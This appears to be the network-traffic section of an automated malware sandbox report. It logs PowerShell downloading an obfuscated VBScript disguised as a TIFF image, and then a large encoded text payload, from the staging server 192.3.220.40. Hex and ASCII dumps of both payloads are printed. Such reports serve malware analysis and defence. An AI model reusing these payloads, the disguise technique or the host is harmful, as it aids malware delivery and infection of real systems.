                                                                                                                                                                                                                    Data Ascii: 52509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509
                                                                                                                                                                                                                    Oct 8, 2024 15:23:43.864537954 CEST448INData Raw: 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32
                                                                                                                                                                                                                    Data Ascii: 9%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252
                                                                                                                                                                                                                    Oct 8, 2024 15:23:43.864551067 CEST1236INData Raw: 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32
                                                                                                                                                                                                                    Data Ascii: 9%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509SEt%252509%252509%252509%252509%252509%252509%
                                                                                                                                                                                                                    Oct 8, 2024 15:23:43.864571095 CEST1236INData Raw: 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35
                                                                                                                                                                                                                    Data Ascii: %252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%2525
                                                                                                                                                                                                                    Oct 8, 2024 15:23:43.864582062 CEST1236INData Raw: 46 41 4d 70 70 59 59 65 53 57 76 58 54 67 6e 76 4d 61 77 4f 72 7a 78 41 63 57 46 50 65 70 72 77 59 46 53 50 6e 49 64 70 49 61 49 53 6b 66 45 4e 4e 50 45 4f 56 61 69 78 52 4e 4d 49 48 6b 58 41 55 71 74 73 71 73 74 68 56 63 6e 5a 66 43 4a 61 72 68
                                                                                                                                                                                                                    Data Ascii: FAMppYYeSWvXTgnvMawOrzxAcWFPeprwYFSPnIdpIaISkfENNPEOVaixRNMIHkXAUqtsqsthVcnZfCJarhovQNARCZTRBqmR%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509
                                                                                                                                                                                                                    Oct 8, 2024 15:23:43.864609003 CEST1236INData Raw: 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32
                                                                                                                                                                                                                    Data Ascii: 9%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252
                                                                                                                                                                                                                    Oct 8, 2024 15:23:43.864669085 CEST1236INData Raw: 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25
                                                                                                                                                                                                                    Data Ascii: 2509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%
                                                                                                                                                                                                                    Oct 8, 2024 15:23:43.864686012 CEST1236INData Raw: 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35
                                                                                                                                                                                                                    Data Ascii: %252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%2525
                                                                                                                                                                                                                    Oct 8, 2024 15:23:43.864702940 CEST1236INData Raw: 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32
                                                                                                                                                                                                                    Data Ascii: 9%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252
                                                                                                                                                                                                                    Oct 8, 2024 15:23:43.869491100 CEST1236INData Raw: 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25
                                                                                                                                                                                                                    Data Ascii: 2509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    2192.168.2.2249165192.3.220.40803876C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    Oct 8, 2024 15:23:48.734661102 CEST355OUTGET /330/verybestthingswesharedfornew.tIF HTTP/1.1
                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                    UA-CPU: AMD64
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                                                                                    Host: 192.3.220.40
                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.200908899 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Date: Tue, 08 Oct 2024 13:23:49 GMT
                                                                                                                                                                                                                    Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                                                                                                                                                                    Last-Modified: Tue, 08 Oct 2024 07:17:57 GMT
                                                                                                                                                                                                                    ETag: "2fbe8-623f1efc6828c"
                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                    Content-Length: 195560
                                                                                                                                                                                                                    Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                    Content-Type: image/tiff
                                                                                                                                                                                                                    Data Raw: ff fe 70 00 72 00 69 00 76 00 61 00 74 00 65 00 20 00 66 00 75 00 6e 00 63 00 74 00 69 00 6f 00 6e 00 20 00 70 00 6c 00 61 00 74 00 69 00 72 00 72 00 6f 00 73 00 74 00 72 00 6f 00 28 00 61 00 72 00 67 00 69 00 6c 00 6c 00 69 00 74 00 61 00 2c 00 20 00 73 00 6f 00 63 00 72 00 61 00 74 00 69 00 63 00 61 00 6d 00 65 00 6e 00 74 00 65 00 2c 00 20 00 65 00 73 00 66 00 65 00 6e 00 6f 00 69 00 64 00 65 00 2c 00 20 00 67 00 61 00 6c 00 6c 00 69 00 6e 00 68 00 65 00 69 00 72 00 61 00 2c 00 20 00 61 00 6c 00 61 00 62 00 61 00 72 00 64 00 69 00 6e 00 6f 00 29 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 69 00 6d 00 20 00 66 00 69 00 6c 00 74 00 65 00 72 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 69 00 6d 00 20 00 64 00 69 00 61 00 6c 00 65 00 63 00 74 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 69 00 6d 00 20 00 65 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 69 00 6d 00 20 00 72 00 65 00 73 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 69 00 6d 00 20 00 66 00 6f 00 72 00 6d 00 61 00 74 00 74 00 65 00 64 00 [TRUNCATED]
                                                                                                                                                                                                                    Data Ascii: private function platirrostro(argillita, socraticamente, esfenoide, gallinheira, alabardino) dim filter dim dialect dim e dim res dim formattedText dim flags flags = 0 if esfenoide.ArgumentExists(NPARA_FILTER) then filter = esfenoide.Argument(NPARA_FILTER) dialect = URI_WQL_DIALECT end if if esfenoide.ArgumentExists(NPARA_DIALECT) then dialect = esfenoide.Argume
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.200983047 CEST1236INData Raw: 00 6e 00 74 00 28 00 4e 00 50 00 41 00 52 00 41 00 5f 00 44 00 49 00 41 00 4c 00 45 00 43 00 54 00 29 00 0d 00 0a 00 20 00 20 00 20 00 20 00 65 00 6e 00 64 00 20 00 69 00 66 00 0d 00 0a 00 20 00 20 00 20 00 20 00 0d 00 0a 00 20 00 20 00 20 00 20
                                                                                                                                                                                                                    Data Ascii: nt(NPARA_DIALECT) end if If LCase(dialect) = "selector" Then dialect = "http://schemas.dmtf.org/
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.201010942 CEST1236INData Raw: 00 69 00 6c 00 74 00 65 00 72 00 20 00 3d 00 20 00 66 00 69 00 6c 00 74 00 65 00 72 00 20 00 26 00 20 00 22 00 3c 00 77 00 73 00 6d 00 61 00 6e 00 3a 00 53 00 65 00 6c 00 65 00 63 00 74 00 6f 00 72 00 20 00 4e 00 61 00 6d 00 65 00 3d 00 27 00 22
                                                                                                                                                                                                                    Data Ascii: ilter = filter & "<wsman:Selector Name='" & Escape(name) & "'>" & Escape(value) & "</wsman:Selector>" Next
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.201028109 CEST1236INData Raw: 00 53 00 45 00 52 00 54 00 42 00 4f 00 4f 00 4c 00 20 00 66 00 61 00 6c 00 73 00 65 00 2c 00 20 00 22 00 2d 00 22 00 20 00 26 00 20 00 4e 00 50 00 41 00 52 00 41 00 5f 00 46 00 49 00 4c 00 54 00 45 00 52 00 20 00 26 00 20 00 22 00 20 00 70 00 61
                                                                                                                                                                                                                    Data Ascii: SERTBOOL false, "-" & NPARA_FILTER & " parameter is required for the given dialect" End If If (esfenoid
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.201035023 CEST1236INData Raw: 00 66 00 0d 00 0a 00 0d 00 0a 00 20 00 20 00 20 00 20 00 69 00 66 00 20 00 65 00 73 00 66 00 65 00 6e 00 6f 00 69 00 64 00 65 00 2e 00 41 00 72 00 67 00 75 00 6d 00 65 00 6e 00 74 00 45 00 78 00 69 00 73 00 74 00 73 00 28 00 4e 00 50 00 41 00 52
                                                                                                                                                                                                                    Data Ascii: f if esfenoide.ArgumentExists(NPARA_RETURN_TYPE) then select case LCase(esfenoide.Argument(NPARA_RETURN_T
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.201040030 CEST1236INData Raw: 00 73 00 74 00 73 00 28 00 4e 00 50 00 41 00 52 00 41 00 5f 00 53 00 48 00 41 00 4c 00 4c 00 4f 00 57 00 29 00 29 00 20 00 74 00 68 00 65 00 6e 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 66 00 6c 00 61 00 67 00 73 00 20 00 3d
                                                                                                                                                                                                                    Data Ascii: sts(NPARA_SHALLOW)) then flags = flags OR argillita.EnumerationFlagHierarchyShallow elseif (esfenoide.Argum
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.201046944 CEST1236INData Raw: 00 2e 00 70 00 6c 00 61 00 74 00 69 00 72 00 72 00 6f 00 73 00 74 00 72 00 6f 00 28 00 67 00 61 00 6c 00 6c 00 69 00 6e 00 68 00 65 00 69 00 72 00 61 00 2c 00 20 00 66 00 69 00 6c 00 74 00 65 00 72 00 2c 00 20 00 64 00 69 00 61 00 6c 00 65 00 63
                                                                                                                                                                                                                    Data Ascii: .platirrostro(gallinheira, filter, dialect, flags) end if end if ASSERTERR socraticamente, alabardino
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.201061964 CEST1000INData Raw: 00 66 00 20 00 45 00 72 00 72 00 2e 00 4e 00 75 00 6d 00 62 00 65 00 72 00 20 00 3d 00 20 00 54 00 5f 00 4f 00 20 00 74 00 68 00 65 00 6e 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20
                                                                                                                                                                                                                    Data Ascii: f Err.Number = T_O then res = e.ReadItem() end if end if if Err.Number <>
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.201077938 CEST1236INData Raw: 00 61 00 74 00 74 00 65 00 64 00 54 00 65 00 78 00 74 00 0d 00 0a 00 20 00 20 00 20 00 20 00 6c 00 6f 00 6f 00 70 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 0d 00 0a 00 20 00 20 00 20 00 20 00 0d 00 0a 00 20 00 20 00 20 00 20 00 69 00 66
                                                                                                                                                                                                                    Data Ascii: attedText loop if(LCase(alabardino) <> VAL_FORMAT_TEXT) then wscript.echo "</wsman:Resul
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.201092958 CEST1236INData Raw: 00 6b 00 63 00 43 00 70 00 22 00 0d 00 0a 00 57 00 71 00 65 00 73 00 4c 00 4c 00 4c 00 57 00 75 00 4b 00 70 00 4b 00 6a 00 69 00 4e 00 20 00 3d 00 20 00 22 00 6f 00 74 00 6b 00 55 00 55 00 7a 00 64 00 6b 00 66 00 4e 00 69 00 65 00 63 00 6f 00 57
                                                                                                                                                                                                                    Data Ascii: kcCp"WqesLLLWuKpKjiN = "otkUUzdkfNiecoW"fOnLAtuBZvPfiWl = "LbrfcTUmHiIzRLW"cKLcabelhalnpCKjCBcL = "liWGSUhUIAdWhiN"
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.206182003 CEST1236INData Raw: 00 22 00 0d 00 0a 00 55 00 55 00 4a 00 78 00 69 00 78 00 42 00 69 00 4e 00 61 00 7a 00 7a 00 50 00 6d 00 61 00 20 00 3d 00 20 00 22 00 4b 00 6e 00 4c 00 6f 00 4b 00 69 00 74 00 4b 00 71 00 75 00 52 00 64 00 73 00 6e 00 6c 00 22 00 0d 00 0a 00 47
                                                                                                                                                                                                                    Data Ascii: "UUJxixBiNazzPma = "KnLoKitKquRdsnl"GGWtokzbUkGQoGA = "BkpiBneqzidkNWl"kWWJicWsbLiPnxr = "WbiGnqmzcfRlzcZ"NAHcU


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    3192.168.2.2249171192.3.220.40803232C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    Oct 8, 2024 15:24:00.732315063 CEST76OUTGET /330/RRCGGH.txt HTTP/1.1
                                                                                                                                                                                                                    Host: 192.3.220.40
                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.206768036 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Date: Tue, 08 Oct 2024 13:24:01 GMT
                                                                                                                                                                                                                    Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                                                                                                                                                                    Last-Modified: Tue, 08 Oct 2024 07:16:04 GMT
                                                                                                                                                                                                                    ETag: "a1000-623f1e913f4cf"
                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                    Content-Length: 659456
                                                                                                                                                                                                                    Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                    Content-Type: text/plain
                                                                                                                                                                                                                    Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 77 44 71 38 67 49 50 73 78 44 54 38 77 43 50 49 73 44 2f 37 77 39 4f 77 75 44 6c 37 51 33 4f 55 74 44 4d 37 41 68 4f 73 72 44 7a 36 77 71 4f 4d 71 44 62 36 51 6b 4f 6f 6f 44 45 36 67 67 4f 45 6f 44 41 35 77 66 4f 34 6e 44 39 35 41 36 4d 30 4d 44 4d 79 51 71 4d 67 4b 44 68 79 41 6f 4d 38 4a 44 63 79 67 6c 4d 49 4a 44 4f 79 67 69 4d 59 45 44 36 78 67 64 4d 55 48 44 30 78 77 63 4d 49 48 44 78 78 41 63 4d 38 47 44 75 78 77 61 4d 6f 47 44 70 78 41 61 4d 63 47 44 6d 78 51 5a 4d 51 47 44 6a 78 67 59 4d 34 46 44 64 78 41 48 41 41 41 41 6a 41 63 41 45 41 34 44 74 2b 41 71 50 59 36 44 68 2b 77 6e 50 30 35 44 62 2b 67 6d 50 67 35 44 54 2b 51 6b 50 77 34 44 4b 2b 41 69 50 59 34 44 46 2b 41 68 50 4d 34 44 43 2b 41 51 50 38 33 44 39 39 41 65 50 59 33 44 78 39 77 62 50 30 32 44 72 39 67 [TRUNCATED]
                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAwDq8gIPsxDT8wCPIsD/7w9OwuDl7Q3OUtDM7AhOsrDz6wqOMqDb6QkOooDE6ggOEoDA5wfO4nD95A6M0MDMyQqMgKDhyAoM8JDcyglMIJDOygiMYED6xgdMUHD0xwcMIHDxxAcM8GDuxwaMoGDpxAaMcGDmxQZMQGDjxgYM4FDdxAHAAAAjAcAEA4Dt+AqPY6Dh+wnP05Db+gmPg5DT+QkPw4DK+AiPY4DF+AhPM4DC+AQP83D99AePY3Dx9wbP02Dr9gYPA2De9QXPY1DO9QTPYwD+8gNP4yDm8gHPYxDO8gxO4vD27g7OYuDe7g1O4sDG6gvOYrDu6gpO4pDW6gjO0oDG5gfOYnDu5gZO8lDe5AXOQlDM5ABOwjD04ALOQiDc4AFOwgDF4gwNofDy3g6NIeDa3g0NocDC2QvNsbD62AuNYbD02wsNgaDm2woNoZDW2QlN4YDN2whNYYDE1QfNwXD61AZNEWDZ1gVNQVDP1QTNwUDL1QSNcUDF1AAN4TD90APNoTD40gNNETDv0gKNgSDn0gJNQSDi0AINsRDZ0AGNYRDU0gENERDK0QCNMMD/zg8MAPDtzQ6MwNDazw1MMNDGzAxMEID9yAsM4KDrywpMoJDYyQlMEJDEygQM8HD7xgbMwGDpxQZMgFDWxwUM8EDCxAAM0DD7wQOMwCDqwwJMUCDjwgFMQBDRwwDM0ADAAAQAQCgBgDwP4/D7/w9Po+Do/Q5PE+DU/g0P88DL/wxPI4Dx+wrPw6Do+ApP85DO+AjPk4DF9AePYnDi5AXOolDZ5AWOQlDT5wTOkkDH5gROUkDE5wQOIgD+4QPOkjDz4QMOAjDv4
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.206825972 CEST1236INData Raw: 67 4c 4f 30 69 44 73 34 41 4b 4f 63 69 44 6a 34 51 48 4f 73 68 44 61 34 51 47 4f 67 68 44 58 34 77 45 4f 49 68 44 4f 34 41 43 4f 59 67 44 46 34 41 42 4f 4d 67 44 43 33 67 2f 4e 30 66 44 35 33 77 38 4e 45 66 44 77 33 77 37 4e 73 65 44 71 33 67 35
                                                                                                                                                                                                                    Data Ascii: gLO0iDs4AKOciDj4QHOshDa4QGOghDX4wEOIhDO4ACOYgDF4ABOMgDC3g/N0fD53w8NEfDw3w7NseDq3g5NUeDh3w2NkdDY3A1N4cDM3wyNocDJ3QhN8bD+2AuNYbD12AtNMbDy2grN0aDp2woNEaDg2AnNsZDX2QkN8YDO2QjNkYDI2ARN4XD81weNoXD51QdNQXDw1gaNgWDn1gZNUWDh1AYNwVDW1AVNMVDS1gTN0UDJ1wQN
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.206839085 CEST1236INData Raw: 78 44 58 38 51 46 50 4d 78 44 52 38 77 44 50 30 77 44 4c 38 51 43 50 63 77 44 46 38 77 41 50 45 73 44 2f 37 51 2f 4f 73 76 44 35 37 77 39 4f 55 76 44 7a 37 51 38 4f 38 75 44 74 37 77 36 4f 6b 75 44 6e 37 51 35 4f 4d 75 44 68 37 77 33 4f 30 74 44
                                                                                                                                                                                                                    Data Ascii: xDX8QFPMxDR8wDP0wDL8QCPcwDF8wAPEsD/7Q/OsvD57w9OUvDz7Q8O8uDt7w6OkuDn7Q5OMuDh7w3O0tDb7Q2OctDV7w0OEtDP7QzOssDJ7wxOUsDD7QgO8rD96wuOkrD36QtOMrDx6wrO0qDr6QqOcqDl6woOEqDf6QnOspDZ6wlOUpDT6QkO8oDN6wiOkoDH6QhOMoDB5wfO0nD75QeOcnD15wcOEnDv5QbOsmDp5wZOUmDj
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.206891060 CEST1236INData Raw: 77 78 4f 59 41 41 41 41 41 4f 41 46 41 4f 41 41 41 41 4e 6b 53 44 6f 30 77 4a 4e 59 53 44 6c 30 41 4a 4e 4d 53 44 69 30 51 49 4e 41 53 44 66 30 67 48 4e 30 52 44 63 30 77 47 4e 6f 52 44 59 30 77 46 4e 59 52 44 56 30 41 46 4e 4d 52 44 52 30 67 44
                                                                                                                                                                                                                    Data Ascii: wxOYAAAAAOAFAOAAAANkSDo0wJNYSDl0AJNMSDi0QINASDf0gHN0RDc0wGNoRDY0wFNYRDV0AFNMRDR0gDN0QDM0wCNoQDJ0ACNcQDF0ABNMQDC0QANAMD/zg/MwPD6AAAAcBQBQDgO8rD+6QvOwrD76guOkrD46wtOYrD16AtOMrDy6QsOArDv6grO0qDs6wqOoqDp6AqOcqDm6QpOQqDj6goOEqDg6wnO4pDd6AnOspDa6QmO
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.206902981 CEST1236INData Raw: 79 44 6e 38 51 4a 50 4d 79 44 68 38 77 48 50 30 78 44 62 38 51 47 50 63 78 44 56 38 77 45 50 45 78 44 50 38 51 44 50 73 77 44 4a 38 77 42 50 55 77 44 44 38 51 77 4f 38 76 44 39 37 77 2b 4f 6b 76 44 33 37 51 39 4f 4d 76 44 78 37 77 37 4f 30 75 44
                                                                                                                                                                                                                    Data Ascii: yDn8QJPMyDh8wHP0xDb8QGPcxDV8wEPExDP8QDPswDJ8wBPUwDD8QwO8vD97w+OkvD37Q9OMvDx7w7O0uDr7Q6OcuDl7w4OEuDf7Q3OstDZ7w1OUtDT7Q0O8sDN7wyOksDH7QxOMsDB6wvO0rD76QuOcrD16wsOErDv6QrOsqDp6wpOUqDj6QoO8pDd6wmOkpDX6QlOMpDR6wjO0oDL6QiOcoDF6wgOEkD/5QfOsnD55wdOUnDz
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.206919909 CEST1236INData Raw: 6f 2f 50 77 2f 6a 35 2f 77 39 50 53 2f 44 79 2f 34 37 50 79 2b 7a 70 2f 30 35 50 54 2b 54 69 2f 38 33 50 6b 39 54 53 2f 59 79 50 44 34 44 36 2b 34 74 50 55 37 6a 79 2b 41 73 50 32 36 44 72 2b 49 71 50 59 36 6a 6a 2b 51 6f 50 36 35 44 63 2b 59 6d
                                                                                                                                                                                                                    Data Ascii: o/Pw/j5/w9PS/Dy/47Py+zp/05PT+Ti/83Pk9TS/YyPD4D6+4tPU7jy+AsP26Dr+IqPY6jj+QoP65Dc+YmPc5jU+gkP+4TN+4gPG0z79scPP2TU9QBPYzTy8oLPHyzf7s7Ozuzq7M2O+sDH6cvOorT26QBOGjjH4IwN+dTYzU5MPOzez01MLNjRxceMzGjgxwXMVAjKwsBMPAAAAQKAFAHAAAwP//j4/o9Pw+Ta/k0P98TM/0xP
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.206932068 CEST1236INData Raw: 35 44 55 2b 67 52 50 41 33 44 73 39 59 61 50 5a 32 7a 6a 39 41 59 50 6d 31 7a 58 39 67 56 50 52 31 6a 48 39 6b 51 50 45 77 7a 38 38 6b 4f 50 4c 7a 7a 72 38 30 4a 50 4c 79 44 66 38 49 67 4f 35 72 6a 30 36 63 6d 4f 41 6c 7a 6d 32 49 74 4e 7a 61 54
                                                                                                                                                                                                                    Data Ascii: 5DU+gRPA3Ds9YaPZ2zj9AYPm1zX9gVPR1jH9kQPEwz88kOPLzzr80JPLyDf8IgO5rj06cmOAlzm2ItNzaTR1oeNJSTv0ALNoSzezU0MCIT4yktMBLTrxAeMxGTQwYPMuDjcwsGMrAAAAAHAEAOAAAwPM/zn/w1PR9DS/QiP+7j9+cpPP6zX+4UPh2DN9QBPlzT38UMP5yjc84FPksDw7U3OstzY700OBtzI7sxOQszB6EvObrDo
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.206943989 CEST1236INData Raw: 34 51 4f 7a 6e 6a 37 35 6b 65 4f 65 6e 6a 77 35 30 61 4f 4a 6d 44 68 35 38 58 4f 30 6c 44 57 35 51 54 4f 48 6b 6a 41 34 30 50 4f 79 6a 6a 31 34 77 4d 4f 75 69 54 71 34 51 4b 4f 5a 69 54 66 34 4d 48 4f 59 68 7a 55 34 34 45 4f 44 68 7a 4a 34 30 42
                                                                                                                                                                                                                    Data Ascii: 4QOznj75keOenjw50aOJmDh58XO0lDW5QTOHkjA40POyjj14wMOuiTq4QKOZiTf4MHOYhzU44EODhzJ40BOCcT/3g/NtfT03c8Nsezp3I6NXeDZ3A0N7cjN3syNOYj62YrNVaTf2gnNzZDa2YlN0YjJ2ohNLUj81scNDXDr1wZNgVDW1sTN2UTM0wNNXTTx04LN4STs0cINtRTW0EFNFRDK04xM7PT8zw9MLPTqz85MSOTiz82M
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.206954956 CEST332INData Raw: 58 54 77 7a 63 69 4d 6d 4c 54 78 79 45 71 4d 61 4b 54 6c 79 55 53 4d 70 42 6a 6d 41 41 41 41 41 42 41 42 41 41 77 50 6d 2f 54 34 2f 49 73 50 47 37 54 70 2b 45 6f 50 36 35 54 64 2b 67 51 50 63 77 44 37 35 41 5a 4f 47 4f 7a 42 79 41 57 4d 77 45 6a
                                                                                                                                                                                                                    Data Ascii: XTwzciMmLTxyEqMaKTlyUSMpBjmAAAAABABAAwPm/T4/IsPG7Tp+EoP65Td+gQPcwD75AZOGOzByAWMwEjCw0OM3AzGAAAAwAwAwDAAA8jw/gaOpljB4QLOwiDr4gKOkiDo4wJOYiDl4AJOMiDi4wWNxODVAAAAwAwAgDAAAYDj2goNEaDg2wnN4ZDd2AXNkXDb1gWNkVDY1wVNYVDV1AFNETDT0gENERDQ0wDN4QDN0AzMnODM
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.206969023 CEST1236INData Raw: 59 69 4d 56 4c 44 7a 79 67 72 4d 63 4a 54 55 79 4d 6b 4d 31 49 44 4b 79 49 52 4d 39 48 6a 32 78 4d 63 4d 75 47 6a 6e 78 41 5a 4d 45 47 44 65 78 6f 57 4d 62 46 54 51 77 55 43 41 41 41 41 54 41 4d 41 77 41 41 41 41 2b 73 71 50 72 30 54 6c 39 34 59
                                                                                                                                                                                                                    Data Ascii: YiMVLDzygrMcJTUyMkM1IDKyIRM9Hj2xMcMuGjnxAZMEGDexoWMbFTQwUCAAAATAMAwAAAA+sqPr0Tl94YPf0DF8cPPHzTt8IIP1xza70HAAAAJAMAsAkjs5gaOelDV5ESOUgjZ44FOVhDG48wN1fTf3E3NMYDa1EVNFVDF14QNHQT+0kNN9STs0AKNFSzd00GNjRzR0MDNLMD8zo+McPzuzs6MmODlxcDMTAAAAwFADAKAAAwP
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.212188959 CEST1236INData Raw: 57 7a 71 31 77 41 4e 74 54 44 32 30 73 4d 4e 37 53 6a 70 30 4d 46 4e 46 52 44 48 30 6b 77 4d 77 50 54 31 7a 55 38 4d 39 4f 44 70 7a 6f 33 4d 71 4e 6a 59 7a 6f 30 4d 71 4d 6a 43 79 6b 74 4d 42 4c 6a 6f 79 63 6f 4d 71 4a 7a 53 79 34 69 4d 70 49 6a
